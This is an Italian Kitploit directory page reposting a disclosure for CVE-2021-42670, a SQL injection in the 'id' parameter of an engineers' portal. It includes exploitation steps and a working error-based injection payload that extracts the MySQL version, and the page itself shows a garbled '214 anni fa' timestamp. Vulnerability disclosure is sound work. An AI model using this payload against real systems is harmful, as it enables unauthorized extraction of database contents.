Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-42670 — CVE-2021-42670 - Vulnerabilità SQL Injection nel sistema del portale online degli ingegneri. | Kitploit
Strumenti/GitHubGitHub/0xdeku/cve-2021-42670
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingSicurezza dei Database
GitHub0xdeku/cve-2021-42670

CVE-2021-42670

CVE-2021-42670 - Vulnerabilità SQL Injection nel sistema del portale online degli ingegneri.

Vedi Repository
214 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2021-42670

CVE-2021-42670 - Vulnerabilità SQL Injection nel sistema del portale online degli ingegneri.

Descrizione tecnica:

Esiste una vulnerabilità SQL Injection nel portale online degli ingegneri. Un attaccante può sfruttare il vulnerabile parametro "id" nella pagina web "announcements_student.php" per manipolare la query SQL eseguita. Di conseguenza, l'attaccante può estrarre dati sensibili dal server web.

Componenti interessati -

Pagina vulnerabile - announcements_student.php

Parametro vulnerabile - "id"

Passaggi per lo sfruttamento:

  1. Navigare a http://localhost/nia_munoz_monitoring_system/announcements_students.php
  2. Inserire il payload nel parametro id

Prova di concetto (Poc) -

Il seguente payload permetterà di estrarre la versione del server MySql in esecuzione sul server web -

root@kitploit:~
1' AND (SELECT 4356 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(MID((IFNULL(CAST(VERSION() AS NCHAR),0x20)),1,51)),0x7178786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pMLo'='pMLo

CVE-2021-42670

Riferimenti -

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42670

https://nvd.nist.gov/vuln/detail/CVE-2021-42670

Scoperto da -

Alon Leviev(0xDeku), 22 Ottobre 2021.

Scarica lo strumento